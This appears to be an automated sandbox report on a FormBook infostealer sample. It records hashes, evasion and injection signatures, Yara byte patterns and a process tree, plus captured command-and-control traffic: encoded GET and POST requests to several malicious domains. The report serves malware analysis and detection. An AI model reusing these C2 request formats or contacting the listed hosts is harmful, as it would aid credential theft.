
Windows Analysis Report
sa7Bw41TUq.exe

Overview

General Information

Sample name: sa7Bw41TUq.exe (renamed because the original name is a hash value)
Original sample name: 207680e811fa11e2aceed223a1ac803751e70ef42f951fad9a068530b0044727.exe
Analysis ID: 1529872
MD5: 6cd77b30f320ed9e0e515073e1175898
SHA1: c60f550fefe35a235e0ddddf876626cf0bdd77eb
SHA256: 207680e811fa11e2aceed223a1ac803751e70ef42f951fad9a068530b0044727
Tags: exe, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • sa7Bw41TUq.exe (PID: 4456 cmdline: "C:\Users\user\Desktop\sa7Bw41TUq.exe" MD5: 6CD77B30F320ED9E0E515073E1175898)
    • svchost.exe (PID: 7200 cmdline: "C:\Users\user\Desktop\sa7Bw41TUq.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • uxEGEjhWYrJv.exe (PID: 1768 cmdline: "C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • typeperf.exe (PID: 7472 cmdline: "C:\Windows\SysWOW64\typeperf.exe" MD5: 93925D4F55465CFC73C4CDF7F8B1F375)
          • uxEGEjhWYrJv.exe (PID: 1104 cmdline: "C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7668 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches in memory dumps (Source | Rule | Description | Author, with matched strings where the rule reports them):
0000000C.00000002.3737461666.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000C.00000002.3737461666.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2bf90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1410f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000C.00000002.3737315515.0000000000B60000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000C.00000002.3737315515.0000000000B60000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2bf90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1410f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(11 further memory-dump entries not shown)

Yara matches in unpacked PE files (Source | Rule | Description | Author, with matched strings where the rule reports them):
9.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
9.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2f463:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x175e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
9.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
9.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2e663:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x167e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\sa7Bw41TUq.exe", CommandLine: "C:\Users\user\Desktop\sa7Bw41TUq.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\sa7Bw41TUq.exe", ParentImage: C:\Users\user\Desktop\sa7Bw41TUq.exe, ParentProcessId: 4456, ParentProcessName: sa7Bw41TUq.exe, ProcessCommandLine: "C:\Users\user\Desktop\sa7Bw41TUq.exe", ProcessId: 7200, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\sa7Bw41TUq.exe", CommandLine: "C:\Users\user\Desktop\sa7Bw41TUq.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\sa7Bw41TUq.exe", ParentImage: C:\Users\user\Desktop\sa7Bw41TUq.exe, ParentProcessId: 4456, ParentProcessName: sa7Bw41TUq.exe, ProcessCommandLine: "C:\Users\user\Desktop\sa7Bw41TUq.exe", ProcessId: 7200, ProcessName: svchost.exe
No Suricata rule has matched

            AV Detection

Source: sa7Bw41TUq.exe | Avira: detected
Source: sa7Bw41TUq.exe | ReversingLabs: Detection: 60%
Source: Yara match | File source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.3737461666.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3737315515.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1688985587.0000000009690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1671982092.00000000067E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3737482520.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3739752184.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: sa7Bw41TUq.exe | Joe Sandbox ML: detected
Source: sa7Bw41TUq.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uxEGEjhWYrJv.exe, 0000000B.00000000.1558723774.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, uxEGEjhWYrJv.exe, 0000000E.00000002.3737429493.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: typeperf.pdb source: svchost.exe, 00000009.00000003.1628080025.0000000003624000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1627986392.000000000361B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1628064356.000000000361A000.00000004.00000020.00020000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000B.00000002.3733446394.0000000000788000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1670896674.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1543886073.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1542199725.0000000003800000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000003.1670422050.0000000002DA5000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000003.1683622628.0000000002F51000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1670896674.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1543886073.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1542199725.0000000003800000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, typeperf.exe, 0000000C.00000003.1670422050.0000000002DA5000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000003.1683622628.0000000002F51000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: typeperf.exe, 0000000C.00000002.3739193871.000000000372C000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3730128385.0000000000981000.00000004.00000020.00020000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000E.00000000.1757312784.000000000298C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1987185043.000000003867C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: typeperf.pdbGCTL source: svchost.exe, 00000009.00000003.1628080025.0000000003624000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1627986392.000000000361B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1628064356.000000000361A000.00000004.00000020.00020000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000B.00000002.3733446394.0000000000788000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: typeperf.exe, 0000000C.00000002.3739193871.000000000372C000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3730128385.0000000000981000.00000004.00000020.00020000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000E.00000000.1757312784.000000000298C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1987185043.000000003867C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_005CC4D0 FindFirstFileW,FindNextFileW,FindClose | 12_2_005CC4D0
Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 4x nop then xor eax, eax | 12_2_005B9A50
Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 4x nop then mov ebx, 00000004h | 12_2_02E504DE
Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe | Code function: 4x nop then xor eax, eax | 14_2_04DD4EF5

            Networking

Source: DNS query: www.mecateg.xyz
Source: Joe Sandbox View | IP Address: 13.248.169.48
Source: Joe Sandbox View | IP Address: 195.110.124.133
Source: Joe Sandbox View | IP Address: 76.223.67.189
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /ptae/?ZZY=w3WU5oZhC+LnKx26kaNk+YWYu6qqBKD6PC4MUwZYu/Z6/i99bgGsvL6SKkltDKfqu2CGNTh4TErFYwL/tEu+bdChCdZ/afdxeSWGORoCU6iTOQ97Sy+G7WrM0B37ODseprTGeRopW7u8&mHm0o=rrqhoH HTTP/1.1Host: www.bluegirls.blogAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /e4x0/?ZZY=LNT2rxv1IZbcC3Jj0QJlS4XPU2WjJkC92LI5ghjdfeHuVtRNJYUfNJ81Qyljm2TCpzqhutEcPP6D5gqXcB7APUAChnFD6LC10hZW5DnCrv8nATu9qGN6LFx4zvr8w5xDip8OL+K5FPsX&mHm0o=rrqhoH HTTP/1.1Host: www.firstcry.shopAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0r21/?mHm0o=rrqhoH&ZZY=fpQWUmUD3QBv9qaBiDNDC55X+pZkXcZKAs7PtWtHybHyzx2AGLiILISraADyo1q+hqHiafFS+6J0wcG7bEgZBkPYVPFAzuLp86jiTbWXEL7WrvfJBC+mpaVtq3e+NG0F9h9/HweK9zd4 HTTP/1.1Host: www.cc101.proAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bp9c/?ZZY=CFj7iDxn1x8AZpvFPceYGF6mfIwPwoMTrHXd5ZNPnjoM55LZ4XrC1cu6kzZqztyAGGEhFACZ681UEqmRh4qhBCgu4rL42B/pdGdLhtvwmGlR74+AXtAhf2M5tQk/HW327Y9QXMr8MgHb&mHm0o=rrqhoH HTTP/1.1Host: www.myjiorooms.servicesAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /sq12/?ZZY=z6EWwjUgJz2bJPVNnwixtdiBclz6U+1c8CkWN3ljQgjJGrzDNHqxSoLtP95ZDgz7MgUxfMzo2dU5U8jEaokJ+YFKTiu0SNRlbEWC0HQQ7kWDv/RczpK4Ywebc8IjilGLuKMcxKVh8K9W&mHm0o=rrqhoH HTTP/1.1Host: www.mecateg.xyzAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /qt7h/?mHm0o=rrqhoH&ZZY=lVRVVIZsXSPU4aIYLW3uXU2G9jyJVB0KcS4/r4NcfnqYIb12Sac4jtyjmKkxLIaqvFDuni/4q4Q88o0YH0xwolv7HpcPHG6ier6546/NEIR09zDvHF3f9eFxq1b7awb/89CQg1iAKK+O HTTP/1.1Host: www.dto20.shopAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /jso9/?mHm0o=rrqhoH&ZZY=uWtD7nDJzC5KbaeYt4wzjwT7dfNvmhcBXDjCWDtDb+iw4yKFuJufFHLJAdi3pLpd6ZSxNjMYLeNLKkNP8PCKZOHQQMiufYU5amodYVRyhU2Q7ZK2dy5aUiQd9WIqGEuwGA/AmJwbELRk HTTP/1.1Host: www.hampelsmagic.lifeAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /s7qk/?ZZY=iaY+w4IpIrYSidyoirH4HJSkbusQX4NI5gNJJ4lc6xQkeif0pMuzzCPjcczGW/AsONaxEKF5w0HAACs6c94+MzxqwLAwe70WCnJ+QkbRlWeyUQ/E8YwpuoNtXuk6ep3axG9muxvIvCTd&mHm0o=rrqhoH HTTP/1.1Host: www.zingara.lifeAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /reui/?ZZY=86WVBsaKd0g/fiy38lBVTFNtYioQJ/XID2I2jzZkjXxxzqQXnIBLpzjUTcMxZ+VjRI6hFe2KzQRCqdeRoprBsBuO38R4j7pNa7/TdtnWnso/3MHserSUB0MZw7CHuHvixsEQagEWFuT7&mHm0o=rrqhoH HTTP/1.1Host: www.polarmuseum.infoAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /fvi9/?ZZY=83Zhgfg6tu/foMGa1rd4G8mvZ8J0ctT1sQtAA8307wl6fpXmtYNgS0h47hPctXYzi3krAK+TuMk8NNNUc7/zlizFi4+uLzj6JeI9HOwnvOMl9isW4EM/0itfBtO8+qbotuSJUZ1vI2TR&mHm0o=rrqhoH HTTP/1.1Host: www.consultarfacil.onlineAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0cbg/?ZZY=ReVCyzq7e32zPSksEOCt3pbKcx4rKGTIyRipE0uGIQ28zkTth8noQJXIJc3ts0ISqVogbi/TYpoiqGzNpNOIXMLKx0kCr+Xw6Q+8qepVva7bCGUCYF3oCYt7aX6G3loK+iyEYGVwNCt0&mHm0o=rrqhoH HTTP/1.1Host: www.40wxd.topAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /eysm/?ZZY=rmFmYSV40EyuHaS2kdWsBSatZMcowP18dPlfx0Yf8gPpQKE966Dkx6Jhfns0QUWGli+3EHMWEp7NMhxdNQGBoYEKFyRFG/hWuIrsEVQcMyBNET9pI9FmSsALbFuO7R/DpXmPiDL0RAp8&mHm0o=rrqhoH HTTP/1.1Host: www.allthingsjasmin.comAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
Source: global traffic | DNS traffic detected: DNS query: www.bluegirls.blog
Source: global traffic | DNS traffic detected: DNS query: www.firstcry.shop
Source: global traffic | DNS traffic detected: DNS query: www.cc101.pro
Source: global traffic | DNS traffic detected: DNS query: www.myjiorooms.services
Source: global traffic | DNS traffic detected: DNS query: www.mecateg.xyz
Source: global traffic | DNS traffic detected: DNS query: www.monos.media
Source: global traffic | DNS traffic detected: DNS query: www.dto20.shop
Source: global traffic | DNS traffic detected: DNS query: www.i16zb920d.cfd
Source: global traffic | DNS traffic detected: DNS query: www.hampelsmagic.life
Source: global traffic | DNS traffic detected: DNS query: www.zingara.life
Source: global traffic | DNS traffic detected: DNS query: www.polarmuseum.info
Source: global traffic | DNS traffic detected: DNS query: www.trafegomagico.shop
Source: global traffic | DNS traffic detected: DNS query: www.consultarfacil.online
Source: global traffic | DNS traffic detected: DNS query: www.40wxd.top
Source: global traffic | DNS traffic detected: DNS query: www.allthingsjasmin.com
Source: global traffic | DNS traffic detected: DNS query: www.ophthalmo.cloud
            Source: unknownHTTP traffic detected: POST /e4x0/ HTTP/1.1Host: www.firstcry.shopAccept: */*Accept-Language: en-US,enAccept-Encoding: gzip, deflateOrigin: http://www.firstcry.shopContent-Length: 216Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheReferer: http://www.firstcry.shop/e4x0/User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36Data Raw: 5a 5a 59 3d 47 50 37 57 6f 45 4c 34 4c 49 44 58 4e 56 78 37 38 53 49 73 4e 37 4c 37 57 33 75 6c 54 58 48 2b 35 64 35 2f 73 7a 6e 65 62 5a 6a 47 49 4d 46 6e 49 35 6b 61 45 39 38 74 62 53 5a 4d 6f 6a 4c 33 6a 67 53 66 70 66 45 49 64 36 32 43 33 69 33 37 57 52 58 51 45 79 59 49 6a 57 4a 38 6e 49 76 78 69 51 46 4d 6a 54 71 43 2b 65 4a 67 53 47 4c 53 69 32 5a 77 4f 51 49 77 36 65 53 6f 37 34 64 61 37 66 70 65 50 73 71 43 47 66 34 58 30 4d 6f 47 51 6d 38 6e 57 32 75 58 56 75 6a 45 45 49 2f 50 75 48 33 77 69 78 64 6d 79 37 6c 56 68 67 76 48 6c 38 68 55 32 33 5a 32 50 34 70 36 41 6a 6d 74 45 67 38 53 72 41 39 4c 38 73 63 70 76 79 47 4c 32 51 3d 3d Data Ascii: ZZY=GP7WoEL4LIDXNVx78SIsN7L7W3ulTXH+5d5/sznebZjGIMFnI5kaE98tbSZMojL3jgSfpfEId62C3i37WRXQEyYIjWJ8nIvxiQFMjTqC+eJgSGLSi2ZwOQIw6eSo74da7fpePsqCGf4X0MoGQm8nW2uXVujEEI/PuH3wixdmy7lVhgvHl8hU23Z2P4p6AjmtEg8SrA9L8scpvyGL2Q==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:05:51 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 74 61 65 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ptae/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:06:57 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:06:59 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" 